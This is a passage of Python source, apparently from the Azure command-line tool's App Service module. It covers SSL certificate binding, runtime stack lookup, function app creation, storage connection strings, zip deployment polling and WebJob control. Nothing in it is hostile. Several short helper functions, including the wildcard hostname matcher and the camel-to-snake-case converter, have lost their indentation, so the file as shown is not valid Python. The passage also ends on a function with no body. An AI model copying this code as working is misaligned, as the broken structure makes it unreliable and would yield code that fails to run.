    AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'  # public cloud
    AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'  # US Government cloud
    graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
    for policy in vault.properties.access_policies:
        try:
            sp = graph_sp_client.get(policy.object_id)
            if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
                for perm in policy.permissions.secrets:
                    if perm == "Get":
                        return True
        except GraphErrorException:
            pass  # Lookup will fail for non service principals (users, groups, etc.)
    return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
                                host_name, ssl_state, thumbprint, slot=None):
    """Flip the SSL binding state of one hostname by sending a minimal Site envelope."""
    Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
    ssl_states = [HostNameSslState(name=host_name,
                                   ssl_state=ssl_state,
                                   thumbprint=thumbprint,
                                   to_update=True)]
    updated_webapp = Site(host_name_ssl_states=ssl_states,
                          location=webapp.location, tags=webapp.tags)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
                                   slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Bind (or unbind) the certificate with the given thumbprint on the app's hostnames."""
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(name))

    # Certificates live in the plan's resource group, which may differ from the app's.
    cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
    for webapp_cert in client.certificates.list_by_resource_group(cert_resource_group_name):
        if webapp_cert.thumbprint != certificate_thumbprint:
            continue
        if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
            # Single non-wildcard hostname: bind it directly.
            return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                               webapp_cert.host_names[0], ssl_type,
                                               certificate_thumbprint, slot)
        # Wildcard or multi-hostname cert: bind every matching hostname on the app.
        query_result = list_hostnames(cmd, resource_group_name, name, slot)
        hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
        for h in _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp):
            _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                        h, ssl_type, certificate_thumbprint, slot)
        return show_webapp(cmd, resource_group_name, name, slot)
    raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Bind an uploaded certificate to the app using SNI or IP-based SSL."""
    SslState = cmd.get_models('SslState')
    state = SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled
    return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, state, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
    """Remove the SSL binding of the certificate with the given thumbprint."""
    SslState = cmd.get_models('SslState')
    return _update_ssl_binding(cmd, resource_group_name, name,
                               certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
    """Resolves runtime stack display names (e.g. 'node|6.1') and knows how to
    apply a stack's configuration onto a SiteConfig object."""

    def __init__(self, cmd, client, linux=False):
        self._cmd = cmd
        self._client = client
        self._linux = linux  # True -> Linux stacks, False -> Windows stacks
        self._stacks = []  # lazily-populated cache of stack dicts

    def resolve(self, display_name):
        """Return the stack dict whose displayName matches (case-insensitive), or None."""
        self._load_stacks_hardcoded()
        return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
                    None)

    @property
    def stacks(self):
        """All known stacks, loading the hardcoded list on first access."""
        self._load_stacks_hardcoded()
        return self._stacks

    @staticmethod
    def update_site_config(stack, site_config, cmd=None):
        """Apply the stack's config key/values directly onto the SiteConfig object."""
        for k, v in stack['configs'].items():
            setattr(site_config, k, v)
        return site_config

    @staticmethod
    def update_site_appsettings(cmd, stack, site_config):
        """Apply the stack's config key/values as app settings (used for node stacks)."""
        NameValuePair = cmd.get_models('NameValuePair')
        if site_config.app_settings is None:
            site_config.app_settings = []
        site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
        return site_config

    def _load_stacks_hardcoded(self):
        """Populate self._stacks from the bundled RUNTIME_STACKS json (no-op when cached)."""
        if self._stacks:
            return
        result = []
        if self._linux:
            result = get_file_json(RUNTIME_STACKS)['linux']
        else:  # Windows stacks
            result = get_file_json(RUNTIME_STACKS)['windows']
        for r in result:
            # node stacks are configured via app settings; everything else via site config
            r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                           r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result

    # Currently using hardcoded values instead of this function. This function calls the stacks API;
    # Stacks API is updated with Antares deployments,
    # which are infrequent and don't line up with stacks EOL schedule.
    def _load_stacks(self):
        """Populate self._stacks from the live provider stacks API (currently unused)."""
        if self._stacks:
            return
        os_type = ('Linux' if self._linux else 'Windows')
        raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
        bytes_value = raw_stacks._get_next().content  # pylint: disable=protected-access
        json_value = bytes_value.decode('utf8')
        json_stacks = json.loads(json_value)
        stacks = json_stacks['value']
        result = []
        if self._linux:
            # Linux stacks expose only a display name (the default minor's runtime version).
            for properties in [(s['properties']) for s in stacks]:
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
                                         None)
                    result.append({
                        'displayName': (default_minor['runtimeVersion']
                                        if default_minor else major['runtimeVersion'])
                    })
        else:  # Windows stacks
            # Maps each stack name to the SiteConfig attribute / app setting it controls.
            config_mappings = {
                'node': 'WEBSITE_NODE_DEFAULT_VERSION',
                'python': 'python_version',
                'php': 'php_version',
                'aspnet': 'net_framework_version'
            }
            # get all stack version except 'java'
            for stack in stacks:
                if stack['name'] not in config_mappings:
                    continue
                name, properties = stack['name'], stack['properties']
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
                                         None)
                    result.append({
                        'displayName': name + '|' + major['displayVersion'],
                        'configs': {
                            config_mappings[name]: (default_minor['runtimeVersion']
                                                    if default_minor else major['runtimeVersion'])
                        }
                    })
            # deal with java, which pairs with java container version
            java_stack = next((s for s in stacks if s['name'] == 'java'))
            java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
            for java_version in java_stack['properties']['majorVersions']:
                for fx in java_container_stack['properties']['frameworks']:
                    for fx_version in fx['majorVersions']:
                        result.append({
                            'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
                                                                  fx['display'],
                                                                  fx_version['displayVersion']),
                            'configs': {
                                'java_version': java_version['runtimeVersion'],
                                'java_container': fx['name'],
                                'java_container_version': fx_version['runtimeVersion']
                            }
                        })
        for r in result:
            r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                           r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
    """Return the instrumentation key of an Application Insights component."""
    appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
    component = appinsights_client.components.get(resource_group, name)
    if component is None or component.instrumentation_key is None:
        raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
    return component.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
                                        number_of_workers=None, max_burst=None, location=None, tags=None):
    """Create (or update) an app service plan suitable for hosting function apps."""
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    sku = _normalize_sku(sku)
    tier = get_sku_name(sku)

    # --max-burst only makes sense for Elastic Premium plans.
    if max_burst is not None:
        if tier.lower() != "elasticpremium":
            raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
        max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
                                                       number_of_workers, min_val=0, max_val=20)

    client = web_client_factory(cmd.cli_ctx)
    if location is None:
        location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    plan_def = AppServicePlan(location=location, tags=tags,
                              sku=SkuDescription(tier=tier, name=sku, capacity=number_of_workers),
                              reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
                              hyper_v=None, name=name)
    return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
    """Return True when the plan is a (dynamic) consumption plan."""
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    return (isinstance(plan_info, AppServicePlan) and
            isinstance(plan_info.sku, SkuDescription) and
            plan_info.sku.tier.lower() == 'dynamic')
def is_plan_elastic_premium(cmd, plan_info):
    """Return True when the plan is an Elastic Premium (EP) plan.

    Consistency fix: compare the SKU tier case-insensitively like the sibling
    is_plan_consumption does; the original's exact match on 'ElasticPremium'
    would miss casing variants of the tier string.
    """
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    if isinstance(plan_info, AppServicePlan):
        if isinstance(plan_info.sku, SkuDescription):
            return plan_info.sku.tier.lower() == 'elasticpremium'
    return False
def validate_and_convert_to_int(flag, val):
    """Convert 'val' to int, raising a user-friendly CLIError naming the offending flag.

    :param flag: flag name used in the error message.
    :param val: value to convert (string or number).
    :raises CLIError: when 'val' cannot be parsed as an integer.
    """
    try:
        return int(val)
    except ValueError as err:
        # Chain the original ValueError so the root cause is preserved (pylint W0707);
        # the original re-raised without 'from', losing the causal link.
        raise CLIError("Usage error: {} is expected to have an int value.".format(flag)) from err
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
    """Validate that 'value' parses as an int within [min_val, max_val] and return it."""
    value = validate_and_convert_to_int(flag_name, value)
    if not min_val <= value <= max_val:
        raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
                                                                                                max_val))
    return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
                    os_type=None, functions_version=None, runtime=None, runtime_version=None,
                    consumption_plan_location=None, app_insights=None, app_insights_key=None,
                    disable_app_insights=None, deployment_source_url=None,
                    deployment_source_branch='master', deployment_local_git=None,
                    docker_registry_server_password=None, docker_registry_server_user=None,
                    deployment_container_image_name=None, tags=None, assign_identities=None,
                    role='Contributor', scope=None):
    """Create a function app on a consumption plan or an existing app service plan.

    Validates the runtime / runtime-version / functions-version combination
    against the bundled stacks json, assembles the SiteConfig and app settings,
    creates the Site, then optionally wires up source control, Application
    Insights, container settings, and a managed identity.
    """
    # pylint: disable=too-many-statements, too-many-branches
    if functions_version is None:
        logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
                       "be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
        functions_version = '2'
    # --plan and --consumption-plan-location are mutually exclusive and one is required.
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
    if bool(plan) == bool(consumption_plan_location):
        raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
    SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
    docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
    site_config = SiteConfig(app_settings=[])
    functionapp_def = Site(location=None, site_config=site_config, tags=tags)
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    client = web_client_factory(cmd.cli_ctx)
    plan_info = None
    if runtime is not None:
        runtime = runtime.lower()
    if consumption_plan_location:
        locations = list_consumption_locations(cmd)
        location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
        if location is None:
            raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
        functionapp_def.location = consumption_plan_location
        functionapp_def.kind = 'functionapp'
        # if os_type is None, the os type is windows
        is_linux = os_type and os_type.lower() == 'linux'
    else:  # apps with SKU based plan
        if is_valid_resource_id(plan):
            parse_result = parse_resource_id(plan)
            plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
        else:
            plan_info = client.app_service_plans.get(resource_group_name, plan)
        if not plan_info:
            raise CLIError("The plan '{}' doesn't exist".format(plan))
        location = plan_info.location
        is_linux = plan_info.reserved
        functionapp_def.server_farm_id = plan
        functionapp_def.location = location
    if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
        raise CLIError(
            "usage error: --runtime RUNTIME required for linux functions apps without custom image.")
    runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
    if runtime is None and runtime_version is not None:
        raise CLIError('Must specify --runtime to use --runtime-version')
    # get the matching runtime stack object ('dotnet' is the default runtime)
    runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
    if not runtime_json:
        # no matching runtime for os
        os_string = "linux" if is_linux else "windows"
        supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
        raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
                       .format(os_string, ', '.join(supported_runtimes)))
    runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
                                                                          functions_version,
                                                                          runtime_version,
                                                                          is_linux)
    if not runtime_version_json:
        supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
                                              _get_supported_runtime_versions_functionapp(runtime_json,
                                                                                          functions_version)))
        if runtime_version:
            if runtime == 'dotnet':
                raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
                               'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
                               .format(runtime_version, functions_version))
            raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
                           '--functions-version {}. Supported versions are: {}.'
                           .format(runtime_version,
                                   runtime,
                                   functions_version,
                                   ', '.join(supported_runtime_versions)))
        # if runtime_version was not specified, then that runtime is not supported for that functions version
        raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
                       '--functions-version {}'
                       .format(runtime, functions_version))
    if runtime == 'dotnet':
        logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
                       '--functions-version. Dotnet version will be %s for this function app.',
                       runtime_version_json[KEYS.DISPLAY_VERSION])
    site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
    app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
    con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
    if is_linux:
        functionapp_def.kind = 'functionapp,linux'
        functionapp_def.reserved = True
        is_consumption = consumption_plan_location is not None
        if not is_consumption:
            site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
                                                          value=str(hexlify(urandom(32)).decode()).upper()))
            if deployment_container_image_name:
                # Custom container image: point the app at the image and disable built-in storage.
                functionapp_def.kind = 'functionapp,linux,container'
                site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
                                                              value=deployment_container_image_name))
                site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='false'))
                site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
            else:
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='true'))
        if deployment_container_image_name is None:
            site_config.linux_fx_version = site_config_json[KEYS.LINUX_FX_VERSION]
    else:
        functionapp_def.kind = 'functionapp'
    # set site configs
    for prop, value in site_config_json.items():
        snake_case_prop = _convert_camel_to_snake_case(prop)
        setattr(site_config, snake_case_prop, value)
    # adding appsetting to site to make it a function
    for app_setting, value in app_settings_json.items():
        site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
    site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
                                                  value=_get_extension_version_functionapp(functions_version)))
    site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
    # If we are not using App Insights, the dashboard setting provides legacy monitoring storage.
    if disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
        site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
    # If plan is not consumption or elastic premium, we need to set always on
    if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
        site_config.always_on = True
    # If plan is elastic premium or windows consumption, we need these app settings
    is_windows_consumption = consumption_plan_location is not None and not is_linux
    if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
                                                      value=con_string))
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
    create_app_insights = False
    if app_insights_key is not None:
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=app_insights_key))
    elif app_insights is not None:
        instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=instrumentation_key))
    elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
        # No key given and not disabled: create an App Insights component after the app exists.
        create_app_insights = True
    poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
    functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
    if consumption_plan_location and is_linux:
        logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
                       "created but is not active until content is published using "
                       "Azure Portal or the Functions Core Tools.", name)
    else:
        _set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
                                 deployment_source_branch, deployment_local_git)
    if create_app_insights:
        try:
            try_create_application_insights(cmd, functionapp)
        except Exception:  # pylint: disable=broad-except
            # Best effort: fall back to storage-based monitoring when AI creation fails.
            logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
                           'Please use the Azure Portal to create and configure the Application Insights, if needed.')
            update_app_settings(cmd, functionapp.resource_group, functionapp.name,
                                ['AzureWebJobsDashboard={}'.format(con_string)])
    if deployment_container_image_name:
        update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
                                              deployment_container_image_name, docker_registry_server_user,
                                              docker_registry_server_password)
    if assign_identities is not None:
        identity = assign_identity(cmd, resource_group_name, name, assign_identities,
                                   role, None, scope)
        functionapp.identity = identity
    return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
    """Load the bundled Functions runtime-stacks JSON for the requested OS."""
    keys = FUNCTIONS_STACKS_API_KEYS()
    platform_key = 'linux' if is_linux else 'windows'
    stacks = get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS[platform_key])
    return stacks[keys.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
    """Return the first stack entry whose name equals *runtime*, or None."""
    keys = FUNCTIONS_STACKS_API_KEYS()
    for stack in stacks_json:
        if stack[keys.NAME] == runtime:
            return stack
    return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
    """List the major-version entries of *runtime_json* that support the
    extension version implied by *functions_version*."""
    keys = FUNCTIONS_STACKS_API_KEYS()
    extension_version = _get_extension_version_functionapp(functions_version)
    return [version_json
            for version_json in runtime_json[keys.PROPERTIES][keys.MAJOR_VERSIONS]
            if extension_version in version_json[keys.SUPPORTED_EXTENSION_VERSIONS]]
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
    """Pick the stack entry matching an explicit *runtime_version*, or the
    default entry for *functions_version* when none was requested.

    Returns None when an explicit version is requested but not found; returns
    an empty dict when no default entry is available.
    """
    keys = FUNCTIONS_STACKS_API_KEYS()
    extension_version = _get_extension_version_functionapp(functions_version)

    if runtime_version:
        # Explicit version: must match the display version and also support
        # the requested extension (functions) version.
        for version_json in runtime_json[keys.PROPERTIES][keys.MAJOR_VERSIONS]:
            if (version_json[keys.DISPLAY_VERSION] == runtime_version and
                    extension_version in version_json[keys.SUPPORTED_EXTENSION_VERSIONS]):
                return version_json
        return None

    # No explicit version: choose the highest-numbered entry flagged as default.
    best_json = {}
    best_version = 0.0
    for candidate in _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
        if not candidate[keys.IS_DEFAULT]:
            continue
        candidate_version = _get_runtime_version_functionapp(candidate[keys.RUNTIME_VERSION], is_linux)
        if not best_json or best_version < candidate_version:
            best_json = candidate
            best_version = candidate_version
    return best_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
    """Parse a runtime version string into a float for comparison purposes.

    Tries the Windows pattern first, then the Linux pattern, then falls back
    to a plain float conversion of the raw string.
    """
    import re
    for pattern in (FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX):
        match = re.fullmatch(pattern, version_string)
        if match:
            return float(match.group(1))
    return float(version_string)
def try_create_application_insights(cmd, functionapp):
    """Best-effort: create an Application Insights component for *functionapp*
    and wire its instrumentation key into the app settings.

    Logs a warning and returns when the component cannot be created.
    """
    creation_failed_warn = ('Unable to create the Application Insights for the Function App. '
                            'Please use the Azure Portal to manually create and configure the Application Insights, '
                            'if needed.')

    app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
    ai_properties = {
        "name": functionapp.name,
        "location": functionapp.location,
        "kind": "web",
        "properties": {
            "Application_Type": "web"
        }
    }
    appinsights = app_insights_client.components.create_or_update(functionapp.resource_group,
                                                                  functionapp.name, ai_properties)
    if appinsights is None or appinsights.instrumentation_key is None:
        logger.warning(creation_failed_warn)
        return

    # Emitted as a warning so the success note does not pollute JSON output on stdout.
    logger.warning('Application Insights \"%s\" was created for this Function App. '
                   'You can visit https://portal.azure.com/#resource%s/overview to view your '
                   'Application Insights component', appinsights.name, appinsights.id)

    update_app_settings(cmd, functionapp.resource_group, functionapp.name,
                        ['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
                             deployment_source_branch='master', deployment_local_git=None):
    """Configure source control on the app: remote git (manual integration)
    when a source URL is given, and/or local git when requested."""
    if deployment_source_url:
        logger.warning("Linking to git repository '%s'", deployment_source_url)
        try:
            config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
                                  deployment_source_branch, manual_integration=True)
        except Exception as ex:  # pylint: disable=broad-except
            # Best-effort: translate the error for display but keep going.
            ex = ex_handler_factory(no_throw=True)(ex)
            logger.warning("Link to git repository failed due to error '%s'", ex)

    if deployment_local_git:
        local_git_info = enable_local_git(cmd, resource_group_name, name)
        logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
        setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
    """Validate *storage_account* (name or full resource ID) for use with a
    function app and return its connection string.

    :raises CLIError: when the account is missing any of the blob/queue/table
        endpoints or uses an unsupported SKU.
    """
    sa_resource_group = resource_group_name
    if is_valid_resource_id(storage_account):
        sa_resource_group = parse_resource_id(storage_account)['resource_group']
        storage_account = parse_resource_id(storage_account)['name']
    storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
    storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
                                                                        storage_account)
    errors = []
    endpoints = storage_properties.primary_endpoints
    sku = storage_properties.sku.name
    allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']

    # Collect every validation failure (previously later endpoint errors
    # overwrote earlier ones, and the SKU error was appended with no separator).
    for e in ['blob', 'queue', 'table']:
        if not getattr(endpoints, e, None):
            errors.append("Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e))  # pylint: disable=line-too-long
    if sku not in allowed_storage_types:
        errors.append('Storage type {} is not allowed'.format(sku))
    if errors:
        raise CLIError(' '.join(errors))

    obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account)  # pylint: disable=no-member
    try:
        keys = [obj.keys[0].value, obj.keys[1].value]  # pylint: disable=no-member
    except AttributeError:
        # Older API versions have a slightly different structure
        keys = [obj.key1, obj.key2]  # pylint: disable=no-member

    endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
    connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
        "https",
        endpoint_suffix,
        storage_account,
        keys[0])  # pylint: disable=no-member
    return connection_string
def list_consumption_locations(cmd):
    """List regions supporting the consumption (Dynamic) SKU as lowercase names."""
    regions = web_client_factory(cmd.cli_ctx).list_geo_regions(sku='Dynamic')
    return [{'name': region.name.lower().replace(' ', '')} for region in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
    """List geo regions that support *sku*, restricted to locations where the
    'Microsoft.Web/sites' resource type is actually available."""
    web_client = web_client_factory(cmd.cli_ctx)
    geo_regions = web_client.list_geo_regions(sku=get_sku_name(sku),
                                              linux_workers_enabled=linux_workers_enabled)

    providers_client = providers_client_factory(cmd.cli_ctx)
    site_locations = []
    for resource_type in getattr(providers_client.get('Microsoft.Web'), 'resource_types', []):
        if resource_type.resource_type == 'sites':
            site_locations = resource_type.locations
            break
    return [geo_region for geo_region in geo_regions if geo_region.name in site_locations]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
    """Poll *deployment_status_url* every 2 seconds until the zip deployment
    succeeds, fails, or the trial budget is exhausted.

    :param timeout: overall budget in seconds (one poll per 2s); defaults to
        450 trials (~15 minutes) when not supplied.
    :raises CLIError: when the service reports failure (status 3) or the
        deployment is still running after the budget is spent.
    """
    import requests
    from azure.cli.core.util import should_disable_connection_verify
    total_trials = (int(timeout) // 2) if timeout else 450
    num_trials = 0
    while num_trials < total_trials:
        time.sleep(2)
        response = requests.get(deployment_status_url, headers=authorization,
                                verify=not should_disable_connection_verify())
        try:
            res_dict = response.json()
        except json.decoder.JSONDecodeError:
            # Treat malformed JSON as "not finished yet" and keep polling.
            logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
            res_dict = {}
        finally:
            # Count the trial whether or not the body parsed.
            num_trials = num_trials + 1
        # Kudu status 3 == deployment failed.
        if res_dict.get('status', 0) == 3:
            _configure_default_logging(cmd, rg_name, name)
            raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log deployment show
                           -n {} -g {}""".format(res_dict, name, rg_name))
        # Kudu status 4 == deployment succeeded.
        if res_dict.get('status', 0) == 4:
            break
        if 'progress' in res_dict:
            logger.info(res_dict['progress'])  # show only in debug mode, customers seem to find this confusing
    # if the deployment is taking longer than expected
    if res_dict.get('status', 0) != 4:
        _configure_default_logging(cmd, rg_name, name)
        raise CLIError("""Timeout reached by the command, however, the deployment operation
                       is still on-going. Navigate to your scm site to check the deployment status""")
    return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
    """List the continuous WebJobs on the app (or the given slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Start a continuous WebJob and return its refreshed state."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
        return web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
    return web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Stop a continuous WebJob and return its refreshed state."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
        return web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
    return web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a continuous WebJob from the app (or the given slot)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    return web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
    """List the triggered WebJobs on the app (or the given slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Trigger a run of a triggered WebJob and return its refreshed state."""
